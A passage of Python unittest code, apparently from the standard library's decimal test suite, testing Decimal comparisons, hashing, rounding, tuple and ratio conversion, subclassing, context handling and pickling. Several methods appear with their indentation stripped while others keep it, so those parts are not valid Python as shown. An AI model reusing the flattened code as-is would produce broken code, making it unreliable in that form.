self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
    # Mixed Decimal/Fraction comparisons, including values near the
    # context's Emax/Etiny limits and NaN behaviour.  `fractions` is the
    # file-level mapping from decimal implementation to its matching
    # fractions module.
    D = self.decimal.Decimal
    F = fractions[self.decimal].Fraction
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation

    # Use the C library's extreme limits when it is available.
    emax = C.MAX_EMAX if C else 999999999
    emin = C.MIN_EMIN if C else -999999999
    etiny = C.MIN_ETINY if C else -1999999997
    c = Context(Emax=emax, Emin=emin)

    with localcontext(c):
        c.prec = emax
        self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
        self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
        self.assertLess(F(0,1), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,1))
        self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
        self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
        self.assertEqual(D("0.1"), F(1,10))
        self.assertEqual(F(1,10), D("0.1"))
        c.prec = 300
        # D(1)/3 is rounded to 300 digits, so it differs from the exact 1/3.
        self.assertNotEqual(D(1)/3, F(1,3))
        self.assertNotEqual(F(1,3), D(1)/3)
        self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
        self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
        self.assertGreater(D('inf'), F(99999999999,123))
        self.assertGreater(D('inf'), F(-99999999999,123))
        self.assertLess(D('-inf'), F(99999999999,123))
        self.assertLess(D('-inf'), F(-99999999999,123))
        # NaN ordering signals from the Decimal side; the Fraction side
        # simply declines the comparison.
        self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
        self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
        self.assertNotEqual(D('nan'), F(-9,123))
        self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
    # hash(Decimal) must agree with hash() of numerically equal ints and
    # floats, and must not depend on the current context.
    Decimal = self.decimal.Decimal
    localcontext = self.decimal.localcontext

    def hashit(d):
        # hash(d) and d.__hash__() must agree.
        a = hash(d)
        b = d.__hash__()
        self.assertEqual(a, b)
        return a

    #just that it's hashable
    hashit(Decimal(23))
    hashit(Decimal('Infinity'))
    hashit(Decimal('-Infinity'))
    hashit(Decimal('nan123'))
    hashit(Decimal('-NaN'))

    test_values = [Decimal(sign*(2**m + n))
                   for m in [0, 14, 15, 16, 17, 30, 31,
                             32, 33, 61, 62, 63, 64, 65, 66]
                   for n in range(-10, 10)
                   for sign in [-1, 1]]
    test_values.extend([
        Decimal("-1"), # ==> -2
        Decimal("-0"), # zeros
        Decimal("0.00"),
        Decimal("-0.000"),
        Decimal("0E10"),
        Decimal("-0E12"),
        Decimal("10.0"), # negative exponent
        Decimal("-23.00000"),
        Decimal("1230E100"), # positive exponent
        Decimal("-4.5678E50"),
        # a value for which hash(n) != hash(n % (2**64-1))
        # in Python pre-2.6
        Decimal(2**64 + 2**32 - 1),
        # selection of values which fail with the old (before
        # version 2.6) long.__hash__
        Decimal("1.634E100"),
        Decimal("90.697E100"),
        Decimal("188.83E100"),
        Decimal("1652.9E100"),
        Decimal("56531E100"),
    ])

    # check that hash(d) == hash(int(d)) for integral values
    for value in test_values:
        self.assertEqual(hashit(value), hashit(int(value)))

    # an integral Decimal hashes the same as the equal int
    self.assertEqual(hashit(Decimal(23)), hashit(23))
    self.assertRaises(TypeError, hash, Decimal('sNaN'))
    self.assertTrue(hashit(Decimal('Inf')))
    self.assertTrue(hashit(Decimal('-Inf')))

    # check that the hashes of a Decimal float match when they
    # represent exactly the same values
    test_strings = ['inf', '-Inf', '0.0', '-.0e1',
                    '34.0', '2.5', '112390.625', '-0.515625']
    for s in test_strings:
        f = float(s)
        d = Decimal(s)
        self.assertEqual(hashit(f), hashit(d))

    with localcontext() as c:
        # check that the value of the hash doesn't depend on the
        # current context (issue #1757)
        x = Decimal("123456789.1")

        c.prec = 6
        h1 = hashit(x)
        c.prec = 10
        h2 = hashit(x)
        c.prec = 16
        h3 = hashit(x)

        self.assertEqual(h1, h2)
        self.assertEqual(h1, h3)

        c.prec = 10000
        x = 1100 ** 1248
        self.assertEqual(hashit(Decimal(x)), hashit(x))
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
    #Test float and int methods, plus math.floor/ceil and round().
    Decimal = self.decimal.Decimal

    d1 = Decimal('66')
    d2 = Decimal('15.32')

    #int
    self.assertEqual(int(d1), 66)
    self.assertEqual(int(d2), 15)

    #float
    self.assertEqual(float(d1), 66)
    self.assertEqual(float(d2), 15.32)

    #floor
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 3),
        ('3.899', 3),
        ('-2.3', -3),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812736),
    ]
    for d, i in test_pairs:
        self.assertEqual(math.floor(Decimal(d)), i)
    # NaNs cannot be converted; infinities overflow.
    self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
    self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
    self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
    self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))

    #ceiling
    test_pairs = [
        ('123.00', 123),
        ('3.2', 4),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('89891211712379812736.1', 89891211712379812737),
    ]
    for d, i in test_pairs:
        self.assertEqual(math.ceil(Decimal(d)), i)
    self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
    self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
    self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
    self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))

    #round, single argument -- banker's rounding (round-half-even)
    test_pairs = [
        ('123.00', 123),
        ('3.2', 3),
        ('3.54', 4),
        ('3.899', 4),
        ('-2.3', -2),
        ('-11.0', -11),
        ('0.0', 0),
        ('-0E3', 0),
        ('-3.5', -4),
        ('-2.5', -2),
        ('-1.5', -2),
        ('-0.5', 0),
        ('0.5', 0),
        ('1.5', 2),
        ('2.5', 2),
        ('3.5', 4),
    ]
    for d, i in test_pairs:
        self.assertEqual(round(Decimal(d)), i)
    self.assertRaises(ValueError, round, Decimal('-NaN'))
    self.assertRaises(ValueError, round, Decimal('sNaN'))
    self.assertRaises(ValueError, round, Decimal('NaN123'))
    self.assertRaises(OverflowError, round, Decimal('Inf'))
    self.assertRaises(OverflowError, round, Decimal('-Inf'))

    #round, two arguments; this is essentially equivalent
    #to quantize, which is already extensively tested
    test_triples = [
        ('123.456', -4, '0E+4'),
        ('123.456', -3, '0E+3'),
        ('123.456', -2, '1E+2'),
        ('123.456', -1, '1.2E+2'),
        ('123.456', 0, '123'),
        ('123.456', 1, '123.5'),
        ('123.456', 2, '123.46'),
        ('123.456', 3, '123.456'),
        ('123.456', 4, '123.4560'),
        ('123.455', 2, '123.46'),
        ('123.445', 2, '123.44'),
        ('Inf', 4, 'NaN'),
        ('-Inf', -23, 'NaN'),
        ('sNaN314', 3, 'NaN314'),
    ]
    for d, n, r in test_triples:
        self.assertEqual(str(round(Decimal(d), n)), r)
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
    # as_tuple() returns (sign, digit-tuple, exponent); the exponent is a
    # letter code for infinities ('F') and NaNs ('n'/'N').
    Decimal = self.decimal.Decimal

    #with zero
    d = Decimal(0)
    self.assertEqual(d.as_tuple(), (0, (0,), 0) )

    #int
    d = Decimal(-45)
    self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )

    #complicated string
    d = Decimal("-4.34913534E-17")
    self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )

    # The '0' coefficient is implementation specific to decimal.py.
    # It has no meaning in the C-version and is ignored there.
    d = Decimal("Infinity")
    self.assertEqual(d.as_tuple(), (0, (0,), 'F') )

    #leading zeros in coefficient should be stripped
    d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
    self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
    d = Decimal( (1, (0, 0, 0), 37) )
    self.assertEqual(d.as_tuple(), (1, (0,), 37))
    d = Decimal( (1, (), 37) )
    self.assertEqual(d.as_tuple(), (1, (0,), 37))

    #leading zeros in NaN diagnostic info should be stripped
    d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
    self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
    d = Decimal( (1, (0, 0, 0), 'N') )
    self.assertEqual(d.as_tuple(), (1, (), 'N') )
    d = Decimal( (1, (), 'n') )
    self.assertEqual(d.as_tuple(), (1, (), 'n') )

    # For infinities, decimal.py has always silently accepted any
    # coefficient tuple.
    d = Decimal( (0, (0,), 'F') )
    self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
    d = Decimal( (0, (4, 5, 3, 4), 'F') )
    self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
    d = Decimal( (1, (0, 2, 7, 1), 'F') )
    self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
def test_as_integer_ratio(self):
    # as_integer_ratio() must return a normalized (p, q) pair of ints
    # with q > 0 and gcd(p, q) == 1, whose quotient equals the Decimal.
    Decimal = self.decimal.Decimal

    # exceptional cases
    self.assertRaises(OverflowError,
                      Decimal.as_integer_ratio, Decimal('inf'))
    self.assertRaises(OverflowError,
                      Decimal.as_integer_ratio, Decimal('-inf'))
    self.assertRaises(ValueError,
                      Decimal.as_integer_ratio, Decimal('-nan'))
    self.assertRaises(ValueError,
                      Decimal.as_integer_ratio, Decimal('snan123'))

    for exp in range(-4, 2):
        for coeff in range(1000):
            for sign in '+', '-':
                d = Decimal('%s%dE%d' % (sign, coeff, exp))
                pq = d.as_integer_ratio()
                p, q = pq

                # check return type
                self.assertIsInstance(pq, tuple)
                self.assertIsInstance(p, int)
                self.assertIsInstance(q, int)

                # check normalization:  q should be positive;
                # p should be relatively prime to q.
                self.assertGreater(q, 0)
                self.assertEqual(math.gcd(p, q), 1)

                # check that p/q actually gives the correct value
                self.assertEqual(Decimal(p) / Decimal(q), d)
def test_subclassing(self):
    # Different behaviours when subclassing Decimal: arithmetic results
    # are plain Decimals, but copy/deepcopy preserve the subclass, and
    # extra attributes are NOT carried over by the constructor.
    Decimal = self.decimal.Decimal

    class MyDecimal(Decimal):
        y = None

    d1 = MyDecimal(1)
    d2 = MyDecimal(2)
    # arithmetic and method results are base-class Decimals
    d = d1 + d2
    self.assertIs(type(d), Decimal)

    d = d1.max(d2)
    self.assertIs(type(d), Decimal)

    # copying keeps the subclass
    d = copy.copy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    d = copy.deepcopy(d1)
    self.assertIs(type(d), MyDecimal)
    self.assertEqual(d, d1)

    # Decimal(Decimal)
    d = Decimal('1.0')
    x = Decimal(d)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(Decimal)
    m = MyDecimal(d)
    self.assertIs(type(m), MyDecimal)
    self.assertEqual(m, d)
    self.assertIs(m.y, None)

    # Decimal(MyDecimal)
    x = Decimal(m)
    self.assertIs(type(x), Decimal)
    self.assertEqual(x, d)

    # MyDecimal(MyDecimal): the numeric value is copied, but the extra
    # attribute y is not -- the new instance falls back to the class default.
    m.y = 9
    x = MyDecimal(m)
    self.assertIs(type(x), MyDecimal)
    self.assertEqual(x, d)
    self.assertIs(x.y, None)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
    """context=None (and rounding=None) must behave exactly like an
    omitted argument: the operation uses the current thread context
    and updates that context's flags."""
    Decimal = self.decimal.Decimal
    Context = self.decimal.Context
    localcontext = self.decimal.localcontext
    InvalidOperation = self.decimal.InvalidOperation
    DivisionByZero = self.decimal.DivisionByZero
    Overflow = self.decimal.Overflow
    Underflow = self.decimal.Underflow
    Subnormal = self.decimal.Subnormal
    Inexact = self.decimal.Inexact
    Rounded = self.decimal.Rounded
    Clamped = self.decimal.Clamped

    with localcontext(Context()) as c:
        c.prec = 7
        c.Emax = 999
        c.Emin = -999

        x = Decimal("111")
        y = Decimal("1e9999")   # exponent above Emax: overflows
        z = Decimal("1e-9999")  # exponent below Emin: subnormal

        ##### Unary functions
        c.clear_flags()
        self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(Overflow, y.exp, context=None)
        self.assertTrue(c.flags[Overflow])

        self.assertIs(z.is_normal(context=None), False)
        self.assertIs(z.is_subnormal(context=None), True)

        c.clear_flags()
        self.assertEqual(str(x.ln(context=None)), '4.709530')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.log10(context=None)), '2.045323')
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(x.logb(context=None)), '2')
        self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
        self.assertTrue(c.flags[DivisionByZero])

        c.clear_flags()
        self.assertEqual(str(x.logical_invert(context=None)), '1111000')
        self.assertRaises(InvalidOperation, y.logical_invert, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
        self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        self.assertEqual(str(z.normalize(context=None)), '0')
        self.assertRaises(Overflow, y.normalize, context=None)
        self.assertTrue(c.flags[Overflow])

        self.assertEqual(str(z.number_class(context=None)), '+Subnormal')

        # sqrt of a subnormal underflows to a clamped zero and raises
        # the full set of underflow-related signals.
        c.clear_flags()
        self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
        self.assertTrue(c.flags[Clamped])
        self.assertTrue(c.flags[Inexact])
        self.assertTrue(c.flags[Rounded])
        self.assertTrue(c.flags[Subnormal])
        self.assertTrue(c.flags[Underflow])
        c.clear_flags()
        self.assertRaises(Overflow, y.sqrt, context=None)
        self.assertTrue(c.flags[Overflow])

        # capitals=0 selects a lowercase exponent letter.
        c.capitals = 0
        self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
        c.capitals = 1

        ##### Binary functions
        c.clear_flags()
        ans = str(x.compare(Decimal('Nan891287828'), context=None))
        self.assertEqual(ans, 'NaN1287828')
        self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.compare_signal(8224, context=None))
        self.assertEqual(ans, '-1')
        self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_and(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_or(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.logical_xor(101, context=None))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.max_mag(101, context=None))
        self.assertEqual(ans, '111')
        self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.min_mag(101, context=None))
        self.assertEqual(ans, '101')
        self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.remainder_near(101, context=None))
        self.assertEqual(ans, '10')
        self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.rotate(2, context=None))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.scaleb(7, context=None))
        self.assertEqual(ans, '1.11E+9')
        self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.clear_flags()
        ans = str(x.shift(2, context=None))
        self.assertEqual(ans, '11100')
        self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        ##### Ternary functions
        c.clear_flags()
        ans = str(x.fma(2, 3, context=None))
        self.assertEqual(ans, '225')
        self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
        self.assertTrue(c.flags[Overflow])

        ##### Special cases
        # rounding=None must fall back to the context's rounding mode.
        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_HALF_EVEN
        ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
        self.assertEqual(ans, '2')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
        self.assertEqual(ans, '1')
        ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '2')
        c.clear_flags()
        self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
        self.assertTrue(c.flags[InvalidOperation])

        c.rounding = ROUND_UP
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
        self.assertEqual(ans, '1.501')
        c.rounding = ROUND_DOWN
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
        self.assertEqual(ans, '1.500')
        ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
        self.assertEqual(ans, '1.501')
        c.clear_flags()
        self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
        self.assertTrue(c.flags[InvalidOperation])

    # localcontext(ctx=None) must copy the *current* context.
    with localcontext(Context()) as context:
        context.prec = 7
        context.Emax = 999
        context.Emin = -999
        with localcontext(ctx=None) as c:
            self.assertEqual(c.prec, 7)
            self.assertEqual(c.Emax, 999)
            self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
    # Run the usability tests against the C accelerator (_decimal).
    decimal = C
class PyUsabilityTest(UsabilityTest):
    # Run the usability tests against the pure-Python implementation.
    decimal = P
class PythonAPItests(unittest.TestCase):
    # Tests for the Python-level API of the decimal module; subclasses
    # set `decimal` to either the C or the pure-Python implementation.

    def test_abc(self):
        # Decimal registers as a numbers.Number but deliberately not as
        # a numbers.Real (it does not interoperate with binary floats).
        Decimal = self.decimal.Decimal
        self.assertTrue(issubclass(Decimal, numbers.Number))
        self.assertFalse(issubclass(Decimal, numbers.Real))
        self.assertIsInstance(Decimal(0), numbers.Number)
        self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
    """Decimal must pickle under every protocol, and pickles must be
    interchangeable between the C and Python implementations."""
    for proto in range(pickle.HIGHEST_PROTOCOL + 1):
        Decimal = self.decimal.Decimal
        savedecimal = sys.modules['decimal']

        # Round trip within a single implementation.
        sys.modules['decimal'] = self.decimal
        d = Decimal('-3.141590000')
        p = pickle.dumps(d, proto)
        e = pickle.loads(p)
        self.assertEqual(d, e)

        if C:
            # Test interchangeability: dump with one implementation
            # installed as `decimal`, load with the other.
            x = C.Decimal('-3.123e81723')
            y = P.Decimal('-3.123e81723')

            sys.modules['decimal'] = C
            sx = pickle.dumps(x, proto)
            sys.modules['decimal'] = P
            r = pickle.loads(sx)
            self.assertIsInstance(r, P.Decimal)
            self.assertEqual(r, y)

            sys.modules['decimal'] = P
            sy = pickle.dumps(y, proto)
            sys.modules['decimal'] = C
            r = pickle.loads(sy)
            self.assertIsInstance(r, C.Decimal)
            self.assertEqual(r, x)

            # Same round trips for the DecimalTuple named tuple.
            x = C.Decimal('-3.123e81723').as_tuple()
            y = P.Decimal('-3.123e81723').as_tuple()

            sys.modules['decimal'] = C
            sx = pickle.dumps(x, proto)
            sys.modules['decimal'] = P
            r = pickle.loads(sx)
            self.assertIsInstance(r, P.DecimalTuple)
            self.assertEqual(r, y)

            sys.modules['decimal'] = P
            sy = pickle.dumps(y, proto)
            sys.modules['decimal'] = C
            r = pickle.loads(sy)
            self.assertIsInstance(r, C.DecimalTuple)
            self.assertEqual(r, x)

        # Restore whichever module was installed before the test.
        sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
def __init__(self, _):
self.x = 'y'
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
self.assertEqual(r.x, 'y')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
